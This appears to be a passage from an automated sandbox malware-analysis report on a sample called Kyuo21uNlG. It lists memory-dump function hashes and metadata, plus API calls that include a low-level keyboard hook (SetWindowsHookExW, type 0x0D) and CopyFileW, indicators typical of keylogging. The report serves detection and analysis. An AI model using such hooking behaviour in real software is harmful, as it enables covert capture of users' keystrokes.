                                            • Opcode ID: 87672045c1acbb2611c52ad5fb8b007ce4d11cb43352bae3e55e7359f0d7da13
                                            • Instruction ID: aee31afafd9bf02431eca98e894b20e4d13bda04c44dc2854f8426a9503be634
                                            • Opcode Fuzzy Hash: 87672045c1acbb2611c52ad5fb8b007ce4d11cb43352bae3e55e7359f0d7da13
                                            • Instruction Fuzzy Hash: C041AC757502049FDB44EB28C955B1AB7A2EFC6300F14C568E116CB3A9CF76DD05CB91
                                            APIs
                                            • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 06A2E6FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: d8dce44bc2814d13767ecf3c53388eafe7aadb252e5b20e764d07ff59da80313
                                            • Instruction ID: ac6e57ecdd8fba2fdb32086e96a694b8f6806cf043a4ae7f27d5808b7d5382be
                                            • Opcode Fuzzy Hash: d8dce44bc2814d13767ecf3c53388eafe7aadb252e5b20e764d07ff59da80313
                                            • Instruction Fuzzy Hash: DD3157B1D002199FCB10DF99D844BDEFBF4FB88314F148429D418AB250C774A985CFA5
                                            APIs
                                            • CopyFileW.KERNEL32(?,00000000,?), ref: 069EC6C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: 6253ef1e0113632ac5c76b574898e8294313b0ba467a210e116ffcc0fbffbaef
                                            • Instruction ID: f7af15de58ccd7da50457fc8cf28ebc046652193914da00ef4119f400e2ee496
                                            • Opcode Fuzzy Hash: 6253ef1e0113632ac5c76b574898e8294313b0ba467a210e116ffcc0fbffbaef
                                            • Instruction Fuzzy Hash: AF312AB2C012199FCB50CFA9D5847EEBBF4EF48310F25816AD858AB255D7349940CBA4
                                            APIs
                                            • CopyFileW.KERNEL32(?,00000000,?), ref: 069EC6C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: a0e0a41ecfbd742300baff7b3f672e9eebf2dd2017c567770a1ec19e0f0d37e0
                                            • Instruction ID: d2ab12955d8231b61da87f868ca895682d814d43e3fde38fb6552f87539e6295
                                            • Opcode Fuzzy Hash: a0e0a41ecfbd742300baff7b3f672e9eebf2dd2017c567770a1ec19e0f0d37e0
                                            • Instruction Fuzzy Hash: 90315CB2C01219DFCB50CF99C4447EEBBF4EF48310F24816AE858BB245D7349940CBA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q
                                            • API String ID: 0-388095546
                                            • Opcode ID: 4c0fa6a7b2b1e2e4b35ee64b69fc1f7ded1a9eadaca114ec33cfc7d5601fa3d4
                                            • Instruction ID: 4c4f2a7980e89b5762cabe1755a934001182cdf1c02a5dc556a4945a7fe571b4
                                            • Opcode Fuzzy Hash: 4c0fa6a7b2b1e2e4b35ee64b69fc1f7ded1a9eadaca114ec33cfc7d5601fa3d4
                                            • Instruction Fuzzy Hash: 0DA12C34B402058FDB15DF68D589AAEBBF2FF88340F14849AE8069B3A5DB75DD41CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: 341374aa950c1da8925c48cf1e423dd55114e26bc56446301de8187ebb5a69be
                                            • Instruction ID: c2a60e013f886fb75cfcad757527bc78a5f5fa7c6b2fc86acfdf7b3b11a0a84c
                                            • Opcode Fuzzy Hash: 341374aa950c1da8925c48cf1e423dd55114e26bc56446301de8187ebb5a69be
                                            • Instruction Fuzzy Hash: 58616674A00A0A9FCF14CF59C5C48AAF7B6FF88310B508A6AD95997715EB30F951CF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q
                                            • API String ID: 0-388095546
                                            • Opcode ID: 8be96866c8f8730d3567fb14d52e97263ae02f7f0fc6ee2a38a9e2e6666b3536
                                            • Instruction ID: 51befd8f064b456f870ea54ec1098613ba741b4cf17aa1b731fcc9f2180dfbd9
                                            • Opcode Fuzzy Hash: 8be96866c8f8730d3567fb14d52e97263ae02f7f0fc6ee2a38a9e2e6666b3536
                                            • Instruction Fuzzy Hash: 2B518D35A452449FEB15CF64D489AAA7BB2FF49300F188096E805CF2A2CB35DD82CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ^
                                            • API String ID: 0-1590793086
                                            • Opcode ID: 3d4176f11564e8e5914589a6c7728290006c2223a9c3b8789f6b4aef2fd6f686
                                            • Instruction ID: 5a2d9f205a6c24f0d8b23954dbdc64daebf3184ebf893f7095c632459eb0b23c
                                            • Opcode Fuzzy Hash: 3d4176f11564e8e5914589a6c7728290006c2223a9c3b8789f6b4aef2fd6f686
                                            • Instruction Fuzzy Hash: 8B01D430E0A2058FDB84DFB4A8182FDBFB0EB8A301F10A5A9D005934B2EB744606CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: W
                                            • API String ID: 0-655174618
                                            • Opcode ID: 01fdbb821e96848cc28cab1d18d8d39131b87cf04e7357a0969cd33123413861
                                            • Instruction ID: 017459800e02d76bc78f8034f282379784279f530251b63cdad87d8dd10a7991
                                            • Opcode Fuzzy Hash: 01fdbb821e96848cc28cab1d18d8d39131b87cf04e7357a0969cd33123413861
                                            • Instruction Fuzzy Hash: E5F0E530E462058FE744EEA8D84A2EDB3B1EBCA310F45D274C404638A2EBBC46038E91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6f8f43a88d1b2682dd403df46392c3ddaad83227ba154b696b1b90631ecf842
                                            • Instruction ID: 034c63581e33b46eabdc968f9c4dabde474fc97b524c005f4fd5f54c84099c52
                                            • Opcode Fuzzy Hash: f6f8f43a88d1b2682dd403df46392c3ddaad83227ba154b696b1b90631ecf842
                                            • Instruction Fuzzy Hash: D5B17C70B446018FE725CF2AD9446BBBBE6BF88344B14496AE457C73A5DB30E841CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0f03e386a78f59cdde33d8b8dc3a152673dedea3c62bd9c2883664c1cc4c81a
                                            • Instruction ID: 30219e7f254134d9ba105f35254e8cb713fe2f3ea9c0d877824d4d92671d4e56
                                            • Opcode Fuzzy Hash: d0f03e386a78f59cdde33d8b8dc3a152673dedea3c62bd9c2883664c1cc4c81a
                                            • Instruction Fuzzy Hash: 4EB1D074E012098FDB14DFA9D988AADBBF2FF88300F14C169E419AB3A5D774A945CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c03ddef0d7df5fb771e46543a4fb09e05e701a85552cddd825266fae0d4e8517
                                            • Instruction ID: 43af129e39a2f095aebc24f670b52b71061a3ffcecb0417128499c1e9bfe6449
                                            • Opcode Fuzzy Hash: c03ddef0d7df5fb771e46543a4fb09e05e701a85552cddd825266fae0d4e8517
                                            • Instruction Fuzzy Hash: B9B1E074E012098FDB14DFA9D988A9DBBF2FF88300F14C169E419AB3A5DB34A945CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f23aeb623a74a6ee0166835feacdf4844aade320feb6d9ada0b1e0be548dc10c
                                            • Instruction ID: a0b26e89f9ab24f1d18440500ae5eea1501b4233098635a84615fbfd8ea96117
                                            • Opcode Fuzzy Hash: f23aeb623a74a6ee0166835feacdf4844aade320feb6d9ada0b1e0be548dc10c
                                            • Instruction Fuzzy Hash: FDA150756403058FCB05DF64D58495ABBF2FF8931070186A8E45A9B7B6DB30FD8ACB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7432eb5ea1fb194dd963356501e6cad0125eff31ffd3e7fd3bf4e995d62721c8
                                            • Instruction ID: d7a6d97cd318fe969fcb59693a2ad3b30abb39d1cfc7b2f10fe08e6d41485acb
                                            • Opcode Fuzzy Hash: 7432eb5ea1fb194dd963356501e6cad0125eff31ffd3e7fd3bf4e995d62721c8
                                            • Instruction Fuzzy Hash: 1AA15E756403058FCB05DF68D58495ABBF2FF893107018A68E45A9B7B6DB30FD8ACB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a161f7b5a56d7e1004886dd2adb85403c85f742aefa78fb309056d3b47f278a6
                                            • Instruction ID: 7d6b9652498de32e1ac63d31c06dd340e43fcb9f6c4c762471655b7ba6307267
                                            • Opcode Fuzzy Hash: a161f7b5a56d7e1004886dd2adb85403c85f742aefa78fb309056d3b47f278a6
                                            • Instruction Fuzzy Hash: F2619D316002069FDB00DB58D980AAFFBF6FF85314B14CA69E4199B355DB31FD8A8B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8405ca8105b1882c05c00e3b8159dacdbdac791c4e654ed008682a4e728d50a0
                                            • Instruction ID: ae9c12d6f65d2245586f1c68c03706566d432e4fb99359cbaafcb6d7b176076d
                                            • Opcode Fuzzy Hash: 8405ca8105b1882c05c00e3b8159dacdbdac791c4e654ed008682a4e728d50a0
                                            • Instruction Fuzzy Hash: EC51BF312003408FD712AB74E95475EBBA2EFC6300B048969E0468B3A6DF38ED4ACB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6a09c2446a987a1fa38cc841054f6127e46bdb756619847887352171206f1e6
                                            • Instruction ID: d2ae8313e0b7aa089a7cdc8190470e56787589f4430879befe4453e24661a37b
                                            • Opcode Fuzzy Hash: c6a09c2446a987a1fa38cc841054f6127e46bdb756619847887352171206f1e6
                                            • Instruction Fuzzy Hash: 7A4193312407005FD752EB24E595B4EBBE2EF82310F84CA28E0468F6A6DB70F94D8B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebdc8b4acde2e8ab084fed3d3a218c42403f33f74db2c005a650cc0aaf71ba5e
                                            • Instruction ID: 11e1e4ae849d190e0eaabd1af352c2b798dcc96022c2766319ef7151d5cc9a7d
                                            • Opcode Fuzzy Hash: ebdc8b4acde2e8ab084fed3d3a218c42403f33f74db2c005a650cc0aaf71ba5e
                                            • Instruction Fuzzy Hash: 0E414B312006019FD715AB74E958A2EBBE3FFC9304B108A2CE5468B795DF75FD4A8B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb04a23291d3c7c469075499a58ee125d205e88ef524353c7b4d1622b7dd497f
                                            • Instruction ID: c5af52aef957122235e73d89284403875036b3a283b788f3569edfc3d36804fe
                                            • Opcode Fuzzy Hash: fb04a23291d3c7c469075499a58ee125d205e88ef524353c7b4d1622b7dd497f
                                            • Instruction Fuzzy Hash: FB4182312407005FD756EB25E955B5EBBE2EF82310F84CA2CE0468F6A6CB70F94D8B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 732a4abeb0476b3c2360481c6a1ec54b596debf64db2cd326655145bd09e5b57
                                            • Instruction ID: ad51a749980556330c48233c0cf6bf8dbca18366ea60581c923d8d768276ef41
                                            • Opcode Fuzzy Hash: 732a4abeb0476b3c2360481c6a1ec54b596debf64db2cd326655145bd09e5b57
                                            • Instruction Fuzzy Hash: 5E413874E012098FDB14CFA8D8885EDFBF2FF4A311F24AA54E009E72A5C7349982CB54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9201b39e1414ebe9f9a330457d887edb6e62bcc6daffec352d058431eca31050
                                            • Instruction ID: 2619487272f85c27de119b160024ea84982a8ed7002abdc36798bacf2ee3cc72
                                            • Opcode Fuzzy Hash: 9201b39e1414ebe9f9a330457d887edb6e62bcc6daffec352d058431eca31050
                                            • Instruction Fuzzy Hash: 9241A074D0020ADFCB04CFA9D5849EEBBF1BF48310F149566E815A7264E734AA85CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cf00f0ce791250d63f2e846e973bd9702f7aa2525ce792769b7e3b8256fc5b3
                                            • Instruction ID: 1f9526d78c29f191bac5a31b93923839ba45697ea01ab559bc571ff300c0c1f0
                                            • Opcode Fuzzy Hash: 7cf00f0ce791250d63f2e846e973bd9702f7aa2525ce792769b7e3b8256fc5b3
                                            • Instruction Fuzzy Hash: D321BF323403015FEB15AB35A9A677F6A63EBC1750F488C28F5128F2D5DE759E4A43D0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 815234da2948e457dccca7c2dcbff3bcafa358d3f000ba057722ad80334227d0
                                            • Instruction ID: fec6743f43a06642916026a61087923cef9ad5cbcdbae32b3d4f45e23329b62e
                                            • Opcode Fuzzy Hash: 815234da2948e457dccca7c2dcbff3bcafa358d3f000ba057722ad80334227d0
                                            • Instruction Fuzzy Hash: 10314971D002088FCB08DFEAD9846DDFBF2BF89310F14D669E405AB2A9DB345985CB15
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a7e5dbe54141b4729da0983e2a09dbe56101fa7c9ac1726f2ec470751c4272f
                                            • Instruction ID: 8d16045915580b3b2244323169fa9ecd6582952798ff9cb540e3ca425bedf112
                                            • Opcode Fuzzy Hash: 6a7e5dbe54141b4729da0983e2a09dbe56101fa7c9ac1726f2ec470751c4272f
                                            • Instruction Fuzzy Hash: AD218E323402015FDB15AB36A99677F66A3EBC1750F488C28F5124F2D5DE71AE4A43D4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f6439f29cdf59bde4da47a6cd06ef2d4061468a5a3598a34a6af14d73be9021
                                            • Instruction ID: 3c1227bc49969bea25228cc42278f8c3298b049c7b87f54da3de31c22f976ea3
                                            • Opcode Fuzzy Hash: 8f6439f29cdf59bde4da47a6cd06ef2d4061468a5a3598a34a6af14d73be9021
                                            • Instruction Fuzzy Hash: F9311670D002088FDB08DFEAD9846DDFBF2BF89310F14D669E405AB2A9DB345985CB15
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124442108.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_aad000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f521abb17bf5cb0a66688d6368250aed0b5abb0e232885d7145f6887a605063e
                                            • Instruction ID: cb87a9e544ebb8e102e016fec3a3cea3562596fe34f474f1e03b171ebce30a86
                                            • Opcode Fuzzy Hash: f521abb17bf5cb0a66688d6368250aed0b5abb0e232885d7145f6887a605063e
                                            • Instruction Fuzzy Hash: 342136B1510240EFCB05DF14D9C4B26BFB5FB89314F24C669E98E0B696C336D816CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124442108.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_aad000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 21dfb627fb2d40af36d40b24b9175f051a0bbc9193e865af0cfa130e21a79b64
                                            • Instruction ID: ae5d9b4832ad0e8f2fe49225a4bfb3b909f8524ce1ce6fb3d59d7ed541839118
                                            • Opcode Fuzzy Hash: 21dfb627fb2d40af36d40b24b9175f051a0bbc9193e865af0cfa130e21a79b64
                                            • Instruction Fuzzy Hash: 99216771900201DFCB04DF04C9C4B27BFB5FB98318F24C569E84A0B696C336D846CBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0f133af780e561a68ae3d371047bdb01a46057adf641b0a76397a8a80e659b5
                                            • Instruction ID: bcd0e6bfee5c540f27ee4b901ab38fedb4053c69d38e4e6cf1942342ea4e19a8
                                            • Opcode Fuzzy Hash: e0f133af780e561a68ae3d371047bdb01a46057adf641b0a76397a8a80e659b5
                                            • Instruction Fuzzy Hash: 90219D316453809FD3158F24D498E5A7FF2EF86314B1584AAE4868B3A2CB35ED89CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124513501.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_abd000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6324c602af0db1ce2911cfec6ca1514002b9f3f2d2312710a12d650e1351e174
                                            • Instruction ID: db93fefdaf5fafc74a76aec6b6fd9271b442f59dee9d517bf7bd0c2bf7b8720e
                                            • Opcode Fuzzy Hash: 6324c602af0db1ce2911cfec6ca1514002b9f3f2d2312710a12d650e1351e174
                                            • Instruction Fuzzy Hash: 73210471504200EFCB04DF14D5C4B66BFA9FB84314F20C9ADD90A4B297D37AE846CA62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124513501.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_abd000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73cc2ba016f7e3f19b3107724471ad72bd0904a3f963573ed5297fd021d387e9
                                            • Instruction ID: 69a05b669439df0b8b03c4bc2113c08444ec5127823406441279740729c15f95
                                            • Opcode Fuzzy Hash: 73cc2ba016f7e3f19b3107724471ad72bd0904a3f963573ed5297fd021d387e9
                                            • Instruction Fuzzy Hash: 49213571504284DFDB00DF14D9C4BAABFA9FB94324F24C669EC094B246D33AD846CA62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124513501.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_abd000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bda4c76ff260f5efbfc6ea33fee65bfde171b230d9d71b0e53d7865c69d3f69d
                                            • Instruction ID: 3fc61ee5844cc9fe7b69937118e8a1d44e89ae06507e49569d3e1dbfec3a6b9e
                                            • Opcode Fuzzy Hash: bda4c76ff260f5efbfc6ea33fee65bfde171b230d9d71b0e53d7865c69d3f69d
                                            • Instruction Fuzzy Hash: 192101B5604244EFCB14DF14D9C0B66BBA9FB88318F20C66DE80D4B297D33AD846CA61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea2feab47b2c917d8f645581e83f723a3ba7d4046a9e611646782595510bbb22
                                            • Instruction ID: 6af0b797e1baba57399609292eefab8bc379d201d447f0e7b407a768a0d2e9f4
                                            • Opcode Fuzzy Hash: ea2feab47b2c917d8f645581e83f723a3ba7d4046a9e611646782595510bbb22
                                            • Instruction Fuzzy Hash: AA21D571548780EFE3268E35D4407AB7BF2FF82200F15099BD1C687791D725D88ACB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f52592d68e2e763ae2308be3a28627a708bd799b1e15a90bc6661d2c5080dfe0
                                            • Instruction ID: 82cf698634e34fe068733a1f2d5f7a9579eb0f57d375b243e5e4cdecd1482594
                                            • Opcode Fuzzy Hash: f52592d68e2e763ae2308be3a28627a708bd799b1e15a90bc6661d2c5080dfe0
                                            • Instruction Fuzzy Hash: 1311A7317141144BE7256E36B4485AFBBAAFFC06A6718407BE50AC6380CF65D882CBA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 329dc321117dd679898c93ed7e30148d9540872e328103b1563a8433eaf1b0c1
                                            • Instruction ID: 9dc571b5ad21b6c23935c9ca07097d6ebf00a0ac7e969453639985192bf5f569
                                            • Opcode Fuzzy Hash: 329dc321117dd679898c93ed7e30148d9540872e328103b1563a8433eaf1b0c1
                                            • Instruction Fuzzy Hash: 4721A1317003409FD3199F24D488E5ABFF6FF85314B1584AAE4868B3A2CB31ED85CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac25bd7cf9aca5e0b08b376626c8d2e7e8213b844674ed974882d308e565d002
                                            • Instruction ID: 2673801abd5fc7aa00bbb5ce68bb197ecc71bfd49df81ee676354e38418d9928
                                            • Opcode Fuzzy Hash: ac25bd7cf9aca5e0b08b376626c8d2e7e8213b844674ed974882d308e565d002
                                            • Instruction Fuzzy Hash: F1216231A00248AFEB15CFE0D844A9E7BB6FF88310F008056E911AB355D775D84ACF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4a651ecd40de78e742fdf52475c8ac921240cf3b1f566fe5640a54cceac10a0
                                            • Instruction ID: d6b322a547d6cb18c199223690e9399147279b8c2f7bf34c9e4fdf61e6cbd47d
                                            • Opcode Fuzzy Hash: e4a651ecd40de78e742fdf52475c8ac921240cf3b1f566fe5640a54cceac10a0
                                            • Instruction Fuzzy Hash: 93118135B043009FE3259F66E484A53BBB7FF86215B1485ABD54B87312CB72E881CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
